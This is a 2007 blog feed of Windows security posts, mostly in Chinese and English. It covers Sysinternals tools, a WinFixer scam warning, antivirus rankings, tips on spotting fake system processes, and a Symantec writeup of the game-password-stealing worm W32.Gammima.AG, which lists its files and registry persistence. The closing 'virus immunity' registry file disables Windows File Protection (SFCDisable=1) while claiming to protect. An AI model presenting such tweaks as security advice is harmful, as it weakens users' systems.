and additional information is available in the on-line help.<br /></p><br /><p><br /></p><p><a href="http://download.sysinternals.com/Files/Autoruns.zip"><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/icons/55x55_download.gif" alt="" border="0" height="55" width="55" /></a><a href="http://download.sysinternals.com/Files/Autoruns.zip"><b>Download Autoruns and Autorunsc (490 KB)</b></a></p><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-2185289736581931339?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-69634140972187409162007-10-30T02:53:00.001-07:002007-10-30T02:53:51.084-07:00Process Explorer v11.03<h2>Introduction</h2><p> Ever wondered which program has a particular file or directory open? Now you can find out. <i>Process Explorer</i> shows you information about which handles and DLLs processes have opened or loaded. </p><p> The <i>Process Explorer</i> display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that <i>Process Explorer</i> is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if <i>Process Explorer</i> is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. <i>Process Explorer</i> also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded. </p><p> The unique capabilities of <i>Process Explorer</i> make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work. </p><p><i>Process Explorer</i> works on Windows 9x/Me, Windows NT 4.0, Windows 2000, Windows XP, Server 2003, and 64-bit versions of Windows for x64 and IA64 processors, and Windows Vista. </p><p><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/images/screenshots/ProcessExplorer.jpg" alt="Process Explorer Screenshot" border="0" height="414" width="570" /></p><p><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/images/screenshots/ProcessExplorer1.jpg" alt="Process Explorer Screenshot" border="0" height="425" width="570" /></p><p>What's new in Version 11.0:</p><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>New treelist control for better UI responsiveness</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Asynchronous thread symbol resolution on threads tab of process properties</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>More flags on groups in security tab and SID display</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Thread IDs on threads tab</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>On-line search uses default web browser and search engine</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Vista ASLR column for processes and DLLs</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Vista Process and thread I/O and memory priorities in process and thread properties</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Vista Process and thread I/O and memory columns</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>PROCESS_QUERY_LIMITED_INFORMATION support on process permissions on Vista</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Run as limited user runs with low IL on Vista</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Reports information for all object types on Vista</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Show details for all processes elevation menu item on Vista</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Supports replacement of task manager on Vista</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>/e to launch elevated</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>/s switch to select a process at startup</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Compiled w/ASLR, DEP</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Faster startup</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Miscellaneous bug fixes and minor improvements</p></td></tr></tbody></table><br /><p><a href="http://download.sysinternals.com/Files/ProcessExplorer.zip"><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/icons/55x55_download.gif" alt="" border="0" height="55" width="55" /></a><a href="http://download.sysinternals.com/Files/ProcessExplorer.zip"><b>Download Process Explorer (1.5 MB)</b></a></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6963414097218740916?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-61725264350791951872007-10-30T02:51:00.000-07:002007-10-30T02:52:48.190-07:00Process Monitor v1.25<h2>Introduction</h2><p><i>Process Monitor</i> is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two legacy Sysinternals utilities, <i>Filemon</i> and <i>Regmon</i>, and adds an extensive list of enhancements including rich and non-destructive filtering, comprehensive event properties such session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and much more. Its uniquely powerful features will make Process Monitor a core utility in your system troubleshooting and malware hunting toolkit. </p><p><i>Process Monitor</i> runs on Windows 2000 SP4 with Update Rollup 1, Windows XP SP2, Windows Server 2003 SP1, and Windows Vista as well as x64 versions of Windows XP, Windows Server 2003 SP1 and Windows Vista.<br /></p><h2>Process Monitor Enhancements over Filemon and Regmon</h2><p> Process Monitor's user interface and options are similar to those of <a href="http://www.microsoft.com/technet/sysinternals/utilities/filemon.mspx">Filemon</a> and <a href="http://www.microsoft.com/technet/sysinternals/utilities/regmon.mspx">Regmon</a>, but it was written from the ground up and includes numerous significant enhancements, such as: </p><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Monitoring of process and thread startup and exit, including exit status codes</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Monitoring of image (DLL and kernel-mode device driver) loads</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>More data captured for operation input and output parameters </p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Non-destructive filters allow you to set filters without losing data</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Capture of thread stacks for each operation make it possible in many cases to identify the root cause of an operation</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Reliable capture of process details, including image path, command line, user and session ID</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Configurable and moveable columns for any event property</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Filters can be set for any data field, including fields not configured as columns</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Advanced logging architecture scales to tens of millions of captured events and gigabytes of log data</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Process tree tool shows relationship of all processes referenced in a trace</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Native log format preserves all data for loading in a different Process Monitor instance</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Process tooltip for easy viewing of process image information</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Detail tooltip allows convenient access to formatted data that doesn't fit in the columna</p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p> Cancellable search </p></td></tr><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p> Boot time logging of all operations </p></td></tr></tbody></table><p>The best way to become familiar with Process Monitor's features is to read through the help file and then visit each of its menu items and options on a live system.</p><h2>Screenshots</h2><p><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/images/screenshots/procmon-main.gif" alt="Process Monitor Screenshot" border="0" height="235" width="550" /></p><br /><p><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/images/screenshots/procmon-proc.gif" alt="Process Monitor Screenshot" border="0" height="404" width="353" /></p><p><a href="http://download.sysinternals.com/Files/ProcessMonitor.zip"><img src="http://img.microsoft.com/library/media/1033/technet/images/sysinternals/icons/55x55_download.gif" alt="" border="0" height="55" width="55" /></a><a href="http://download.sysinternals.com/Files/ProcessMonitor.zip"><b>Download Process Monitor (913 KB)</b></a></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6172526435079195187?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-78487456603769581902007-10-15T04:15:00.000-07:002007-10-15T04:16:17.460-07:00WinFixer Strikes Again<p>For the past couple of weeks, we've been seeing an increase in spam advertising a fake application called <a href="http://en.wikipedia.org/wiki/WinFixer">WinFixer</a>.</p> <p>This particular wave of spam claims to come from a man named Pierre Boutin and is aimed at Francophones. We've also seen versions in English but the product is the same - a <a href="http://www.spywarewarrior.com/rogue_anti-spyware.htm">rogue program</a> which gives you false warnings about viruses, then encourages you to buy the fake anti-spyware software -- which may even make things worse, <a href="http://research.sunbelt-software.com/threatdisplay.aspx?name=WinFixer&threatid=41898">according to research from Sunbelt Software</a>.</p> <p>The application has been around for awhile in a variety of forms. For example, you may have seen popups that look like Windows warning dialogs and say "If your computer has been running slower than normal, it may be infected with Viruses, Adware, or Spyware." </p> <div style="padding: 3px; background-color: rgb(238, 238, 238); width: 563px; height: 172px;"><img src="http://blog.siteadvisor.com/images/Winantivirus.png" height="157" width="562" />A misleading popup designed to look like a Windows dialog.<br /></div> <p>That's the same application. It also goes by the names <a href="http://www.siteadvisor.com/sites/errorsafe.com">ErrorSafe</a>, <a href="http://blog.siteadvisor.com/spywareadware/SystemDoctor,%20SysProtect,%20%3Ca%20href=" com="" sites="" com="">DriveCleaner</a>, <a href="http://www.siteadvisor.com/sites/winantispyware.com">WinAntiSpyware</a>, ECsecured and <a href="http://www.siteadvisor.com/sites/winantivirus.com">WinAntiVirus</a>. Sunbelt has also found Winfixer <a href="http://sunbeltblog.blogspot.com/2005/12/another-fake-security-site.html">promoted on a series of fake security sites</a>.</p> <p>Another variant of the same application goes under the name of PrivacyProtector. The <a href="http://www.siteadvisor.com/sites/privacyprotector.com">PrivacyProtector website is currently rated green</a> by SiteAdvisor, because it hasn't had any downloads for us to test. However, we'll be overriding that to red shortly, based on its association with WinFixer. </p> <p>There's already a class-action lawsuit against the makers and distributors of the program. The lawyer who leads the action (quoted in this Silicon Valley television news investigation) claims that WinFixer generates as much as $34 million per year in ill-gotten revenue:</p> <p><object height="350" width="425"><param name="movie" value="http://www.youtube.com/v/zBUZHiKhsog"><param name="wmode" value="transparent"><embed src="http://www.youtube.com/v/zBUZHiKhsog" type="application/x-shockwave-flash" wmode="transparent" height="350" width="425"></embed></object></p> <p>The plaintiffs are having trouble locating the actual scammers, though: according to Wikipedia, the application and its associated domains have an ownership trail that runs through the UK, the Ukraine, and Belize.</p> <p>At any rate, if you find an offer to install WinFixer or any of its relatives, don't. And if it installs itself, don't pay for it-- look for a way to get rid of it, instead. You can protect yourself by using SiteAdvisor, and also by using the <a href="http://firefox.com/">Firefox</a> web browser, which may be <a href="http://en.wikipedia.org/wiki/WinFixer#Firefox_Popup">somewhat more resistant</a> to automatic installation attacks.</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-7848745660376958190?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-26237580107203197162007-09-22T08:00:00.000-07:002007-09-22T08:01:07.285-07:00出名殺毒軟件反病毒智能系統 + 殺毒系統排行 (8月)反病毒智能系統排行 (7月)<br /><br />1.Avira AntiVir - 71%<br /><br />2.Fortinet FortiClient - 71%<br /><br />3.ESET NOD32 - 68%<br /><br />4.AEC TrustPort - 58%<br /><br />5.Bitdefender - 48%<br /><br />6.F-Prot - 31%<br /><br />7.AVK AntiVirus Kit - 31%<br /><br />8.F-Secure - 31%<br /><br />9.Dr.Web - 30%<br /><br />10.Norman Virus Control - 29%<br /><br />11.avast! - 26%<br /><br />12.Symantec Norton AntiVirus - 24%<br /><br />13.Mcafee VirusScan - 24%<br /><br />14.Microsoft OneCare - 18%<br /><br /><span style="color:red;"><b>15.Kaspersky AntiVirus - 9%</b></span><br /><br />16.MicroWorld eScan Anti-Virus - 9%<br /><br />17.AVG Anti-Malware - 8%<br /><br />殺毒系統排行 (8月)<br /><br />1.AntiVir PE Premium - 99.45%<br /><br />2.TrustPort AV WS - 99.64%<br /><br />3.GDATA AntiVirusKit - 99.31%<br /><br /><span style="color:blue;"><b>4.Symantec Norton Anti-Virus - 98.80%</b></span><br /><br /><span style="color:red;"><b>5.Kaspersky Anti-Virus - 98.46%</b></span><br /><br />6.Bitdefender - 97.85%<br /><br />7.AVG Anti-Malware - 97.75%<br /><br /><br />8.NOD32 Anti-Virus - 97.60%<br /><br />9.F-Secure Anti-Virus - 97.57%<br /><br />10.eScan Anti-Virus - 97.53%<br /><br />11.avast! Professional - 95.24%<br /><br />12.Mcafee VirusScan Plus - 93.15%<br /><br />13.F-Prot Anti-Virus - 92.20%<br /><br />14.Norman VirusControl - 90.93%<br /><br />15.Microsoft OneCare - 90.37%<br /><br />16.FortiClient - 89.98%<br /><br />17.Dr.Web - 89.87%<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-2623758010720319716?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-15547461932222827202007-09-04T01:01:00.000-07:002007-09-04T01:04:51.506-07:00Security Software - Norton 360<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.symantec.com/norton360/about/images/n360_screenshot_alert_big.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://www.symantec.com/norton360/about/images/n360_screenshot_alert_big.jpg" alt="" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_RaNVvoxx8SA/Rt0RU4qe1bI/AAAAAAAAAAM/cFDBGnQVSHQ/s1600-h/Norton360_Screen1_large.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp0.blogger.com/_RaNVvoxx8SA/Rt0RU4qe1bI/AAAAAAAAAAM/cFDBGnQVSHQ/s200/Norton360_Screen1_large.jpg" alt="" id="BLOGGER_PHOTO_ID_5106256603013633458" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br />We recommend users to use Norton 360<br /><br />BUY NOW<br />http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.518300/pbPage.N360PDpopup_v2/pgm.8087200<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-1554746193222282720?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-8011280506071239212007-08-30T02:52:00.001-07:002007-08-30T02:52:45.298-07:00病毒進程<div style="font-size: 12px;"><span id="tpid7890797"><span id="spid7890797"><span style="color:black;">任何病毒和木馬存在于系統中,都無法徹底和進程脫離關系,即使采用了隐藏技術,也還是能夠從進程中找到蛛絲馬迹,因此,查看系統中活動的進程成爲我們檢測病毒木馬最直接的方法。但是系統中同時運行的進程那麽多,哪些是正常的系統進程,哪些是木馬的進程,而經常被病毒木馬假冒的系統進程在系統中又扮演着什麽角色呢?請看本文。 </span><br /><br /><b><span style="color:black;">病毒進程隐藏三法</span></b><br /><span style="color:black;"> 當我們确認系統中存在病毒,但是通過“任務管理器”查看系統中的進程時又找不出異樣的進程,這說明病毒采用了一些隐藏措施,總結出來有三法:</span><br /><br /><span style="color:black;">1.以假亂真</span><br /><span style="color:black;"> 系統中的正常進程有:svchost.exe、explorer.exe、iexplore.exe、winlogon.exe等,可能你發現過系統中存在這樣的進程:svch0st.exe、explore.exe、iexplorer.exe、winlogin.exe。對比一下,發現區别了麽?這是病毒經常使用的伎倆,目的就是迷惑用戶的眼睛。通常它們會将系統中正常進程名的o改爲0,l改爲i,i改爲j,然後成爲自己的進程名,僅僅一字之差,意義卻完全不同。又或者多一個字母或少一個字母,例如explorer.exe和iexplore.exe本來就容易搞混,再出現個iexplorer.exe就更加混亂了。如果用戶不仔細,一般就忽略了,病毒的進程就逃過了一劫。</span><br /><br /><span style="color:black;">2.偷梁換柱</span><br /><span style="color:black;"> 如果用戶比較心細,那麽上面這招就沒用了,病毒會被就地正法。于是乎,病毒也學聰明了,懂得了偷梁換柱這一招。如果一個進程的名字爲svchost.exe,和正常的系統進程名分毫不差。那麽這個進程是不是就安全了呢?非也,其實它隻是利用了“任務管理器”無法查看進程對應可執行文件這一缺陷。我們知道svchost.exe進程對應的可執行文件位于“C:\WINDOWS\system32”目錄下(Windows2000則是C:\WINNT\system32目錄),如果病毒将自身複制到“C:\WINDOWS\”中,并改名爲svchost.exe,運行後,我們在“任務管理器”中看到的也是svchost.exe,和正常的系統進程無異。你能辨别出其中哪一個是病毒的進程嗎?</span><br /><br /><span style="color:black;">3.借屍還魂</span><br /><span style="color:black;"> 除了上文中的兩種方法外,病毒還有一招終極大法——借屍還魂。所謂的借屍還魂就是病毒采用了進程插入技術,将病毒運行所需的dll文件插入正常的系統進程中,表面上看無任何可疑情況,實質上系統進程已經被病毒控制了,除非我們借助專業的進程檢測工具,否則要想發現隐藏在其中的病毒是很困難的。</span><br /><br /><b><span style="color:black;">系統進程解惑</span></b><br /><span style="color:black;"> 上文中提到了很多系統進程,這些系統進程到底有何作用,其運行原理又是什麽?下面我們将對這些系統進程進行逐一講解,相信在熟知這些系統進程後,就能成功破解病毒的“以假亂真”和“偷梁換柱”了。</span><br /><br /><b><span style="color:black;">svchost.exe</span></b><br /><span style="color:black;"> 常被病毒冒充的進程名有:svch0st.exe、schvost.exe、scvhost.exe。随着Windows系統服務不斷增多,爲了節省系統資源,微軟把很多服務做成共享方式,交由svchost.exe進程來啓動。而系統服務是以動态鏈接庫(DLL)形式實現的,它們把可執行程序指向scvhost,由cvhost調用相應服務的動态鏈接庫來啓動服務。我們可以打開“控制面闆”→“管理工具”→服務,雙擊其中“ClipBook”服務,在其屬性面闆中可以發現對應的可執行文件路徑爲“C:\WINDOWS\system32\clipsrv.exe”。再雙擊“Alerter”服務,可以發現其可執行文件路徑爲“C:\WINDOWS\system32\svchost.exe -k LocalService”,而“Server”服務的可執行文件路徑爲“C:\WINDOWS\system32\svchost.exe -k netsvcs”。正是通過這種調用,可以省下不少系統資源,因此系統中出現多個svchost.exe,其實隻是系統的服務而已。</span><br /><span style="color:black;"> 在Windows2000系統中一般存在2個svchost.exe進程,一個是RPCSS(RemoteProcedureCall)服務進程,另外一個則是由很多服務共享的一個svchost.exe;而在WindowsXP中,則一般有4個以上的svchost.exe服務進程。如果svchost.exe進程的數量多于5個,就要小心了,很可能是病毒假冒的,檢測方法也很簡單,使用一些進程管理工具,例如Windows優化大師的進程管理功能,查看svchost.exe的可執行文件路徑,如果在“C:\WINDOWS\system32”目錄外,那麽就可以判定是病毒了。</span><br /><br /><b><span style="color:black;">explorer.exe</span></b><br /><span style="color:black;"> 常被病毒冒充的進程名有:iexplorer.exe、expiorer.exe、explore.exe。explorer.exe就是我們經常會用到的“資源管理器”。如果在“任務管理器”中将explorer.exe進程結束,那麽包括任務欄、桌面、以及打開的文件都會統統消失,單擊“任務管理器”→“文件”→“新建任務”,輸入“explorer.exe”後,消失的東西又重新回來了。explorer.exe進程的作用就是讓我們管理計算機中的資源。</span><br /><span style="color:black;"> explorer.exe進程默認是和系統一起啓動的,其對應可執行文件的路徑爲“C:\Windows”目錄,除此之外則爲病毒。</span><br /><br /><b><span style="color:black;">iexplore.exe</span></b><br /><span style="color:black;"> 常被病毒冒充的進程名有:iexplorer.exe、iexploer.exeiexplorer.exe進程和上文中的explorer.exe進程名很相像,因此比較容易搞混,其實iexplorer.exe是Microsoft Internet Explorer所産生的進程,也就是我們平時使用的IE浏覽器。知道作用後辨認起來應該就比較容易了,iexplorer.exe進程名的開頭爲“ie”,就是IE浏覽器的意思。</span><br /><span style="color:black;"> iexplore.exe進程對應的可執行程序位于C:\ProgramFiles\InternetExplorer目錄中,存在于其他目錄則爲病毒,除非你将該文件夾進行了轉移。此外,有時我們會發現沒有打開IE浏覽器的情況下,系統中仍然存在iexplore.exe進程,這要分兩種情況:1.病毒假冒iexplore.exe進程名。2.病毒偷偷在後台通過iexplore.exe幹壞事。因此出現這種情況還是趕快用殺毒軟件進行查殺吧。</span><br /><br /><b><span style="color:black;">rundll32.exe</span></b><br /><span style="color:black;"> 常被病毒冒充的進程名有:rundl132.exe、rundl32.exe。rundll32.exe在系統中的作用是執行DLL文件中的内部函數,系統中存在多少個Rundll32.exe進程,就表示Rundll32.exe啓動了多少個的DLL文件。其實rundll32.exe我們是會經常用到的,他可以控制系統中的一些dll文件,舉個例子,在“命令提示符”中輸入“rundll32.exe user32.dll,LockWorkStation”,回車後,系統就會快速切換到登錄界面了。rundll32.exe的路徑爲“C:\Windows\system32”,在别的目錄則可以判定是病毒。</span><br /><br /><b><span style="color:black;">spoolsv.exe</span></b><br /><span style="color:black;"> 常被病毒冒充的進程名有:spoo1sv.exe、spolsv.exe。spoolsv.exe是系統服務“Print Spooler”所對應的可執行程序,其作用是管理所有本地和網絡打印隊列及控制所有打印工作。如果此服務被停用,計算機上的打印将不可用,同時spoolsv.exe進程也會從計算機上消失。如果你不存在打印機設備,那麽就把這項服務關閉吧,可以節省系統資源。停止并關閉服務後,如果系統中還存在spoolsv.exe進程,這就一定是病毒僞裝的了。</span><br /><span style="color:black;"> 限于篇幅,關于常見進程的介紹就到這裏,我們平時在檢查進程的時候如果發現有可疑,隻要根據兩點來判斷:</span><br /><span style="color:black;"> 1.仔細檢查進程的文件名;</span><br /><span style="color:black;"> 2.檢查其路徑。</span><br /><span style="color:black;"> 通過這兩點,一般的病毒進程肯定會露出馬腳。</span></span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-801128050607123921?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-6888069801078506972007-08-27T22:54:00.000-07:002007-08-27T22:55:53.006-07:00Others - Got Battlefield 2 Cars?<a href="http://www.youtube.com/watch?v=b8khh9cOAMw">Got Battlefield 2 Cars? Part A </a><br /><br /><br /><a href="http://www.youtube.com/watch?v=Z_rzWjuafsc">Got Battlefield 2 Cars? Part B</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-688806980107850697?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-40343216585978842242007-08-27T22:53:00.000-07:002007-08-27T22:54:07.807-07:00New Threat - W32.Gammima.AG<div id="tabModBdy"> <div> <strong>Discovered: </strong>August 27, 2007</div> <div> <strong>Updated: </strong>August 27, 2007 11:08:32 AM</div> <div> <strong>Type: </strong>Worm</div> <div> <strong>Infection Length: </strong>75,520 bytes</div> <div> <strong>Systems Affected: </strong>Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP</div> When the worm executes, it creates the following files:<br /><ul><li>%System%\kavo.exe</li><li>%System%\kavo0.dll</li></ul><br /><br />The file kavo0.dll is then injected into all running processes.<br /><br />It also creates the following file, which is a copy of <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2002-011710-0057-99">Hacktool.Rootkit</a>:<br />%Temp%\[RANDOM FILE NAME].dll<br /><br />The worm then copies itself to all drives from C through Z as the following file:<br />[DRIVE LETTER]:\ntdelect.com<br /><br />It also creates the following file so that it executes whenever the drive is accessed:<br />[DRIVE LETTER]:\autorun.inf<br /><br />Next, the worm creates the following registry entry so that it executes whenever Windows starts:<br />HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"kava" = "%System%\kavo.exe"<br /><br />It then modifies the following registry entries:<br /><ul><li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\"CheckedValue" = "0"</li><li>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Hidden" = "2"</li><li>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"ShowSuperHidden" = "0"</li><li>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Pocilies\Explorer\"NoDriveTypeAutoRun" = "0x91"</li></ul><br /><br />The worm checks if it has been injected into any of the following processes:<br /><ul><li>zhengtu.dat</li><li>elementclient.exe</li><li>dekaron.exe</li><li>hyo.exe</li><li>wsm.exe and ybclient.exe</li><li>fairlyclient.exe</li><li>so3d.exe</li><li>maplestory.exe</li><li>r2client.exe</li><li>InphaseNXD.EXE</li></ul><br /><br />It then attempts to steal sensitive information for the following online games:<br /><ul><li>ZhengTu</li><li>Wanmi Shijie or Perfect World</li><li>Dekaron Siwan Mojie</li><li>HuangYi Online</li><li>Rexue Jianghu</li><li>ROHAN</li><li>Seal Online</li><li>Maple Story</li><li>R2 (Reign of Revolution)</li><li>Talesweaver</li></ul><br /><br />The worm ends the Matrix Password process if it finds a dialog box with the following characteristics:<br /><strong>Title:</strong> MatrixPasswordDlg<br /><strong>Message:</strong> Warning! (In Chinese characters)<br /><br />The harvested information is then sent to the remote attacker via HTTP.<h3>Recommendations</h3><p>Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":</p> <ul class="listSQbl"><li>Turn off and remove unneeded services. By default, many operating systems install auxiliary services that are not critical, such as an FTP server, telnet, and a Web server. These services are avenues of attack. If they are removed, blended threats have less avenues of attack and you have fewer services to maintain through patch updates.</li><li>If a <a href="http://securityresponse.symantec.com/avcenter/refa.html#blended_threat">blended threat</a> exploits one or more network services, disable, or block access to, those services until a patch is applied.</li><li>Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services (for example, all Windows-based computers should have the current Service Pack installed.). Additionally, please apply any security updates that are mentioned in this writeup, in trusted Security Bulletins, or on vendor Web sites.</li><li>Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.</li><li>Configure your email server to block or remove email that contains file attachments that are commonly used to spread viruses, such as .vbs, .bat, .exe, .pif and .scr files.</li><li>Isolate infected computers quickly to prevent further compromising your organization. Perform a forensic analysis and restore the computers using trusted media.</li><li>Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.</li></ul> <div> <strong>Writeup By: </strong>Masaki Suenaga</div> </div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-4034321658597884224?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-40463355727306065172007-08-26T20:11:00.000-07:002007-08-26T20:12:56.096-07:00禁止1200多種已知病毒的進程,做母盤必備<div style="font-size: 12px;"><span id="tpid7820511"><span id="spid7820511">以下是我在長期制作系統中所做的經驗總結,對現在有許多病毒連<span style="color:black;">殺毒</span>軟件都束手無策,看到大家都在爲病毒煩惱,所以我放出這個注冊表,禁止病毒的進程運行.包括現在最火的logo_.exe<br /><br />LSASS.EXE等許多病毒.大家如果發現新病毒進程,可以自己修改這個注冊表對這個病毒進行免疫.<br /><br />Windows Registry Editor Version 5.00<br /><br />[HKEY_CURRENT_USER\Control Panel\Desktop]<br />"AutoEndTasks"="1"<br />"HungAppTimeout"="200"<br />"WaitToKillAppTimeout"="200"<br />"WaitTOKillService"="200"<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]<br />"WaitToKillServiceTimeout"="200"<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]<br />"EnablePrefetcher"=dword:00000001<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]<br />"SFCDisable"=dword:00000001<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL]<br />@="0"<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]<br />"AutoShareServer"=dword:00000000<br />"AutoSharewks"=dword:00000000<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows]<br />"NoPopUpsOnBoot"=dword:00000001<br />[HKEY_CLASSES_ROOT\lnkfile]<br />@="快捷方式"<br />"EditFlags"=dword:00000001<br />"NeverShowExt"=""<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace]<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]<br />@="Printers"<br 